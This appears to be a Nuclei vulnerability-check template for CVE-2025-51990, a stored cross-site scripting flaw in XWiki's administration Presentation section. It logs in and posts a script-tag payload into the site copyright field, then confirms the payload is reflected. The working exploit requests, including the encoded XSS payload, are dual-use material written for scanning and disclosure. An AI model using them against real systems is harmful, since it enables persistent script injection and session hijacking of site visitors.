XWiki through version 17.3.0 contains stored cross-site scripting caused by improper sanitization of inputs in the Administration interface's Presentation section, letting authenticated administrators inject JavaScript that executes in visitors' browsers, exploit requires administrator authentication.
PoC代码[已公开]
id: CVE-2025-51990
info:
name: XWiki – Stored Cross-Site Scripting (XSS)
author: 0x_Akoko
severity: medium
description: |
XWiki through version 17.3.0 contains stored cross-site scripting caused by improper sanitization of inputs in the Administration interface's Presentation section, letting authenticated administrators inject JavaScript that executes in visitors' browsers, exploit requires administrator authentication.
impact: |
Attackers can execute persistent scripts in users' browsers, leading to session hijacking, credential theft, and unauthorized actions without user interaction.
remediation: |
Update to a version later than 17.3.0 or the latest available version.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-51990
- https://github.com/malcxlmj/cve-writeups/blob/main/CVE-2025-51990.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-79
metadata:
max-request: 4
verified: true
tags: xwiki,xss,stored-xss,authenticated
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /bin/login/XWiki/XWikiLogin HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: login_token
internal: true
regex:
- 'name="form_token" value="([^"]+)"'
group: 1
- raw:
- |
POST /bin/loginsubmit/XWiki/XWikiLogin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
xredirect=&form_token={{login_token}}&j_username={{username}}&j_password={{password}}
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(location, '/bin/view/Main/')
condition: and
internal: true
- raw:
- |
GET /bin/admin/XWiki/XWikiPreferences?editor=globaladmin§ion=Presentation HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: form_token
internal: true
regex:
- 'data-xwiki-form-token="([^"]+)"'
group: 1
- raw:
- |
POST /bin/saveandcontinue/XWiki/XWikiPreferences HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
XWiki.XWikiPreferences_0_showannotations=&XWiki.XWikiPreferences_0_showcomments=&XWiki.XWikiPreferences_0_showattachments=&XWiki.XWikiPreferences_0_showhistory=&XWiki.XWikiPreferences_0_showinformation=&XWiki.XWikiPreferences_0_title=&XWiki.XWikiPreferences_0_meta=&XWiki.XWikiPreferences_0_webcopyright=%3CScRiPt%3Ealert%28%27{{randstr}}%27%29%3B%3C%2FScRiPt%3E&XWiki.XWikiPreferences_0_version=&form_token={{form_token}}&xcontinue=%2Fbin%2Fadmin%2FXWiki%2FXWikiPreferences%3Feditor%3Dglobaladmin%26section%3DPresentation&xredirect=%2Fbin%2Fadmin%2FXWiki%2FXWikiPreferences%3Feditor%3Dglobaladmin%26section%3DPresentation&classname=XWiki.XWikiPreferences&formactionsac=Save
- |
GET /bin/admin/XWiki/XWikiPreferences HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, '<ScRiPt>alert(\'{{randstr}}\');</ScRiPt>')
- contains(body, 'footerglobal')
condition: and
# digest: 4b0a004830460221009e419baee72db81aa452b81a9342c52c18abfd2c4af13b76ffbdfdc49f2f3fb5022100e81c6643d39662e840cf7f81dc89ccb93bbaea762e9bd2112e826d09245514fb:922c64590222798bb761d5b6d8e72950